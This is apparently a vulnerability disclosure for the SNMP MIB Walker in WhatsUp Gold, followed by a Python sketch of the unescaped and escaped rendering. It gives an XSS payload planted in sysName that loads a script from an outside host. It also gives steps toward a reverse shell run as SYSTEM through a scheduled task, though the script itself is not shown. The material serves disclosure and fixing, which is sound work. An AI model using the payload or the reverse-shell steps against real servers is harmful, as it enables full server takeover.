Improper validation of strings returned by SNMP devices when using the SNMP MIB Walker makes the application prone to a reflected XSS attack.
Steps To Reproduce:
Place an XSS payload in the SNMPD.conf on a Linux computer. Have the payload load a JavaScript file hosted on an HTTPS web server (because WhatsUpGold is served over HTTPS, you cannot link to an HTTP web server). SNMP walk the Linux computer's IP.
Modify the script below to run a reverse shell. You can base64-decode my payload, change the IP and port, base64-encode it again and put it in the script. Or of course run another payload.
Save the script on a web server.
Add the XSS pointing at the URL of the script to the SNMPD config; I placed it in sysName:
sysContact Me <[email protected]>
sysLocation Home
sysName LinuxPC<script src='https://f20.be/t.js'/>
Open the SNMP MIB Walker tool and "walk" the IP address of the Linux computer.
Script
Function of script
It creates a PowerShell scheduled task containing, in this example, a reverse shell.
It triggers the task to run every five minutes.
Impact
The attacker gains remote code execution as the "NT System" account.
Full control of the server.
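The root cause is that an SNMP OCTET STRING is placed into the MIB walker's HTML without output encoding. As an added illustration of the fix (not WhatsUp Gold's own code), the snippet below shows the defective pattern beside a hardened renderer that formats the value the way a MIB walker should (printable ASCII as text, anything else as a hex dump) and HTML-escapes it before it reaches the page; the sysName sample and the placeholder domain are constructed.

```python
import html
import re

# Constructed sample: a hostile sysName as an agent could return it
# (attacker.example is a placeholder, not a real host).
SAMPLE_SYSNAME = b"LinuxPC<script src='https://attacker.example/t.js'/>"
SYSNAME_OID = ".1.3.6.1.2.1.1.5.0"

OID_RE = re.compile(r"\.?\d+(\.\d+)*")


def render_mib_row_unsafe(oid: str, raw: bytes) -> str:
    """The defect class: the agent-controlled string lands in HTML verbatim."""
    return f"<tr><td>{oid}</td><td>{raw.decode('latin-1')}</td></tr>"


def format_octet_string(raw: bytes) -> str:
    """Render an OCTET STRING for an HTML text node.

    Printable ASCII is shown as text; anything else becomes a hex dump so
    control bytes cannot confuse the display. The result is HTML-escaped
    (including quotes, so it is also safe inside a quoted attribute).
    """
    if all(0x20 <= b < 0x7F for b in raw):
        text = raw.decode("ascii")
    else:
        text = "Hex-STRING: " + " ".join(f"{b:02X}" for b in raw)
    return html.escape(text, quote=True)


def render_mib_row(oid: str, raw: bytes) -> str:
    """Hardened row: the OID is validated, the value is output-encoded."""
    if not OID_RE.fullmatch(oid):
        raise ValueError(f"invalid OID: {oid!r}")
    return f"<tr><td>{oid}</td><td>{format_octet_string(raw)}</td></tr>"


if __name__ == "__main__":
    print(render_mib_row_unsafe(SYSNAME_OID, SAMPLE_SYSNAME))
    print(render_mib_row(SYSNAME_OID, SAMPLE_SYSNAME))
```

The same encoding must be applied to every SNMP-sourced string the walker displays (sysContact, sysLocation, sysDescr, interface names and so on), not just sysName.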